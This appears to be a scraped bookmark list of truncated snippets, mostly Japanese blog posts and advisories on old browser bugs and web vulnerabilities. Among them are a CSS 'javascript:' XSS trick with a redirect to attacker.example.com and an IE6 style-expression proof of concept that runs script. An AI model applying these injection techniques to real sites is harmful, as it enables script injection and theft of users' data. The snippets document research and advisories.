Opera News
Desktop Opera One R2 introduces dynamic Themes August 20th, 2024 Opera One R2 introduces dynamic Themes which allow you to customize your browser with animated backgrounds and change the UI... Opera for iOS Introducing Opera One for iOS: a fresh take on mobile browsing August 14th, 2024 We're excited to announce the launch of Opera One for iOS, our redesigned, AI-powered browser for iPhone. Opera
hoshikuzu | star_dust の書斎 - 2007-09-18 IEではHTMLのコメントにスタイルを付加できるらしい
バージョン Firefoxの1.508ぐらいの古いもので考えてみました。 background:url("javascript:ほえほえ") background:url("javascript:ほえほえ");Firefoxでは上記のようなスタイル記述をほどこしたbody要素内の各要素で、ほえほえを安易に書いたときに、documentオブジェクトには手が出せません。つまりcookieを単純に盗み出すことが出来ないのかもしれません。権限がないというエラーメッセージが出るのです。また、JavaScriptの組み込み関数も利用できません。alert()とか。XSSされにくい感じです。windowオブジェクトにも制限がかかっているかもしれません。 でもでもでも locationオブジェクトそのものに値を設定はできます。 location="attacker.example.com";これでURLの
hoshikuzu | star_dust の書斎 InternetExplorer6::base要素のstyle属性が全要素に効くのでJavaScriptも記述し放題
下のソースでローカルにHTMLファイルを作りIE6で開く。一行目はおまじないなので省略しない。img要素とかbr要素とかが泣ける。 <!-- saved from url=(0014)about:internet --> <html> <head> <title>nandakore</title> </head> <body> <base id="b00" style="width:expression(setTimeout(this.innerText,0))"> <pre> resizeTo (400, 400); </pre> <img> document.title='areare'; </img> <br> var hoge = 'foo'; </br> <blockquote> window.status = hoge; </blockquote> </body> </html
CGIライブラリのDoS脆弱性について
Posted by usa on 2 Nov 2006 Rubyに標準で添付されているCGIライブラリ(cgi.rb)において、このライブラリを使用してCGIを作成した場合、DoS(Denial Of Service)状態を容易に引き起こしてしまう脆弱性が存在することが発見されました。 この脆弱性については、CVE-2006-5467として公開されています。 該当するバージョンのCGIライブラリを利用している場合は、対策を行うことを推奨します。 脆弱性の存在するバージョン 1.8系 1.8.5以前の全てのバージョン 開発版(1.9系) 2006-09-23以前の全てのバージョン 各バージョンでの対応方法 1.8系 1.8.5に更新した上で、パッチを適用してください。 このパッチのmd5sumは9d25f59d1c33a0b215f6c25260dcb536、サイズは367バイトです。 また
blog.8-p.info: Safari is evil
Internet Explorer の CSS 実装に怒る人は Safari の JavaScript 実装にも怒るべきだ、と思ったんだけど、シェアがあるのにバグがあるから困るわけで、シェアが無くてバグがあるなら無視すればいい気がしてきた。 そのくらいひどいです。 正規表現で "//" のエスケープが使えない fladdict.net blog: 今見ているサイト内で「はてなブックマーク」されてるエントリ一覧を表示するブックマークレット さっそく使ってみようとしたらsafariのおバカが… matchで引っかかっているようです.正規表現中のスラッシュのエスケープ(//)をバックスラッシュ(\/)に変更したら動きました.他のブラウザではふつうに動くのになぁ.一応ご報告です. "?" より前の "\" は "/" になる これで Bookmarklet、なぜかSafariで読めないな… - o
DirectX
Microsoft Learn. Spark possibility. Build skills that open doors. See all you can do with documentation, hands-on training, and certifications to help you get the most from Microsoft products. Learn by doing Gain the skills you can apply to everyday situations through hands-on training personalized to your needs, at your own pace or with our global network of learning partners. Take training Find
活動日誌(2005-12-15) - Selenium で //input[@name='n' and @value='v'] と書くと IE でエラーになる
■ [Selenium]Selenium で //input[@name='n' and @value='v'] と書くと IE でエラーになる件 このパッチで動くようになった。 Index: html-xpath/html-xpath-patched.js =================================================================== --- html-xpath/html-xpath-patched.js (revision 666) +++ html-xpath/html-xpath-patched.js (working copy) @@ -602,7 +602,7 @@ { var attribute = node.attributes[i]; var attributeValue = attribute.nodeValue
Safari の JavaScript の不備 Days on the Moon
ぱっと見はいいんだけど細かいところでちょこちょこ穴があるような気がする Safari (というより Apple WebKit) ですが、どのような穴がいつふさがれてきたのかまとめてみました。最初は JavaScript 関係だけ調べるつもりだったのですが Safari 2.0.3 で setSelectionRange がサポートされたというのを聞いたのでそっちのほうも少し。ただし、手元に Mac 環境がないので実際に Safari で試したわけではありません。すべてソースと変更履歴から推測しただけなのでそのつもりで。 下の表で「WebKit」というのはその機能が実装された WebKit の (正式公開) バージョン、「Safari」というのはそのときの Safari のバージョンをあらわしています。「-」はその機能が現時点 (Safari 2.0.3) でも未実装ということです。「-」は
Account Suspended
Account Suspended This Account has been suspended. Contact your hosting provider for more information.
ppBlog - IEのメモリリーク問題
IEあるいはIEエンジンのブラウザ(Sleipnirとか)を使っていて、どうもページの描画速度が遅い気がする―もっと正確には最初にページを開いたときより遅くなった―と感じたことはないだろうか? 特にあなたがJavaScriptを多用したページを開いているならば、もしかしたらIE特有のメモリリーク問題(IE memory leaks problemG)が原因かもしれない。 余談ですが、前回のmoblogエントリーは、自分のブログにモブログしたつもりが間違ってこちらにエントリーしてしまいました。気が向いたら移動しておきます。 で、本題ですが、この問題はより多くの利用者が(IEエンジンの)タブブラウザーを使うようになればなるほど顕在化してくると思われるのでメモしておこうと思います。ppBlogでもJavaScriptは欠かせませんし。最初に言っておきますが、この問題はIE4-6に特有のもので他の
yohgaki's blog - PHPの現行リリースに重大な脆弱性(PHP4.4.0以下、PHP5.0.5以下) - まとめ
(Last Updated On: 2018年8月13日)追記 2007/11/06: 現在のリリース版(4.4.7, 5.2.4)ではこの脆弱性は修正されていす。これより以前のPHPでも修正されていますが、別の脆弱性があるので最新リリース版の使用をお奨めします。 追記:PHP 5.1.1、PHP 5.1.2にはPHP 5.1.0で追加された対策がなぜか削除されています。PHP5でosCommerce等、register_globals=onが必須のアプリケーションやimport_request_variable関数を使用したregister_globals=off対策を行っている古いPHPスクリプトなどを動作させる場合には注意が必要です。register_globals=onが必要なアプリケーションへの対処が参考になります。 よろしければWebサイトセキュリティ対策入門も参考にしていただ
t_komuraの日記
最近の PHP(PHP 4.3.11 以降) の mbstring には多くのバグが報告、修正されていますが、そろそろ把握しきれなくなってきましたので、まとめてみました。何か間違い等ありましたら指摘していただけると幸いです。 これらのバグは CVS では既に修正されていますので、今後、公開されるバージョンでは問題ありません。また、PHP のバージョンは Patch を適用していないソースのものです。 PHP 5.0.6 はリリースされない可能性が高そうです。 mb_detect_encoding() が失敗する 概要 mb_detect_encoding() が正しく文字コード検出をできないことがある。 これが原因で mb_convert_encoding() が失敗することがあり、文字化けを起こすことがある。 バグを含んでいるバージョン PHP 4.3.11 PHP 5.0.0 - PH
1
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
Ruby - Bug #3119: [Patch] "IOError (closed stream)" error with tempfile unlink then close usage - Ruby Issue Tracking System
http://rocketeer.dip.jp/unicode/